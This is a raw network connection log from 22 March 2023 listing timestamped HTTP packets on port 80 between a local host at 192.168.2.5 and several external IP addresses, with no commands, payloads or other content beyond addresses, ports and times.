Mar 22, 2023 05:43:42.862987995 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.863028049 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.863692045 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.863734961 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.863785982 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.863786936 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.863828897 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.863852978 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.864430904 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.864476919 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.864521027 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.864622116 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.864653111 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.865186930 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.865230083 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.865272045 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.865370035 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.865396976 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.866000891 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.866045952 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.866081953 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.866193056 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.866225958 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.869016886 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.869098902 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.869174957 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.869191885 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.869333982 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.869333982 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.869333982 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.869334936 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.881699085 CET	80	49910	13.248.216.40	192.168.2.5
Mar 22, 2023 05:43:42.882390976 CET	80	49909	108.167.164.216	192.168.2.5
Mar 22, 2023 05:43:42.891676903 CET	80	49909	108.167.164.216	192.168.2.5
Mar 22, 2023 05:43:42.892153978 CET	49909	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:42.896891117 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.896939039 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.897110939 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.897109985 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.897140026 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.897213936 CET	80	49911	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:42.897222996 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.897268057 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.897763014 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.897788048 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.897793055 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.897818089 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.897846937 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.897881985 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.897937059 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.897939920 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.897994041 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.898304939 CET	80	49911	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:42.898395061 CET	49911	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:42.899277925 CET	80	49911	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:42.899379969 CET	49911	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:42.914799929 CET	49911	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:42.921361923 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.921610117 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.921644926 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.921678066 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.921746969 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.921746969 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.922202110 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.922276974 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.922347069 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.922347069 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.922413111 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.922513008 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.922626972 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.922677994 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.922724962 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.922806025 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.922899961 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.922899961 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.922900915 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.922940016 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.923108101 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.923141956 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.923196077 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.923448086 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.923626900 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.923660994 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.923743010 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.923767090 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.923777103 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.923810959 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.923835993 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.923835993 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.923844099 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.923945904 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.923945904 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.945575953 CET	49909	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:42.946106911 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.946125984 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.946166992 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.946263075 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.946263075 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.946263075 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.946317911 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.946398020 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.946469069 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.946490049 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.946631908 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.946742058 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.946742058 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.946810961 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.946854115 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.946902990 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.946932077 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.946950912 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.947066069 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.947115898 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.947165966 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.947179079 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.947268009 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.947366953 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.947673082 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.947751999 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.947774887 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.947802067 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.947823048 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.947874069 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.947926998 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.947926998 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.947926998 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.947926998 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.947941065 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.947973013 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.948004007 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.948072910 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.948136091 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.948384047 CET	49913	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:42.948462963 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.948549032 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.948590040 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.948621035 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.948645115 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.948685884 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.948710918 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.948731899 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.948791981 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.948842049 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.948842049 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.948842049 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.948843002 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.948904991 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.949225903 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.949318886 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.949327946 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.949352026 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.949388027 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.949441910 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.949486971 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.949522972 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.949522972 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.949522972 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.949523926 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.949563980 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.949579000 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.949681997 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.949812889 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.949812889 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.949846983 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.949898005 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.950052023 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.950052023 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.950103045 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.950123072 CET	80	49892	135.181.73.98	192.168.2.5
Mar 22, 2023 05:43:42.950193882 CET	49892	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:42.950220108 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.950258017 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.950346947 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.950371027 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.950423956 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.969893932 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.969916105 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.969939947 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.969969034 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.970107079 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.970472097 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.970494986 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.970520020 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.970524073 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.970554113 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.970726013 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.970784903 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.970824957 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.970834017 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.970956087 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.971007109 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.971026897 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.971045017 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.971054077 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.971095085 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.971139908 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.971188068 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.971211910 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.971214056 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.971256018 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.971390009 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.971400976 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.971400976 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.971442938 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.971606016 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.971630096 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.971705914 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.971733093 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.971756935 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.971834898 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.971874952 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.971898079 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.971924067 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.971939087 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.971945047 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.971966028 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.971967936 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.971967936 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.971996069 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.972069979 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.972069979 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.972232103 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.972311974 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.972353935 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.972388983 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.972404957 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.972413063 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.972471952 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.972590923 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.972867966 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.972889900 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.972954035 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.972976923 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.972996950 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.973009109 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.973009109 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.973009109 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.973026037 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.973050117 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.973073959 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.973094940 CET	80	49910	13.248.216.40	192.168.2.5
Mar 22, 2023 05:43:42.973155975 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.973159075 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.973206043 CET	49910	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:42.973212957 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.973217010 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.973277092 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.973301888 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.973301888 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.973334074 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.973468065 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.973596096 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.973653078 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.973756075 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.973809958 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.973855019 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.973877907 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.973906994 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.973931074 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.973934889 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.973956108 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.973979950 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.974020958 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.974049091 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.974092007 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.974108934 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.974174023 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.974231958 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.974232912 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.974234104 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.974327087 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.974340916 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.974421024 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.974536896 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.974558115 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.974558115 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.974620104 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.974706888 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.974706888 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.974710941 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.974730968 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.974760056 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.974782944 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.974809885 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.974814892 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.974860907 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.974863052 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.974962950 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.974966049 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.974966049 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.975056887 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.975075960 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.975187063 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.975219011 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.975271940 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.975303888 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.975326061 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.975368977 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.975480080 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.975501060 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.975605965 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.975632906 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.975657940 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.975681067 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.975696087 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.975707054 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.975727081 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.975761890 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.975842953 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.975884914 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.975884914 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.975913048 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.975934982 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.976030111 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.976267099 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.976310015 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.976330042 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.976372004 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.976372004 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.976382971 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.976406097 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.976473093 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.976509094 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.976527929 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.976592064 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.976711988 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.976810932 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.976850033 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.976888895 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.976887941 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.976887941 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.977020025 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.977086067 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.977118969 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.977251053 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.977330923 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.977421045 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.977449894 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.977449894 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.977559090 CET	80	49912	62.75.216.137	192.168.2.5
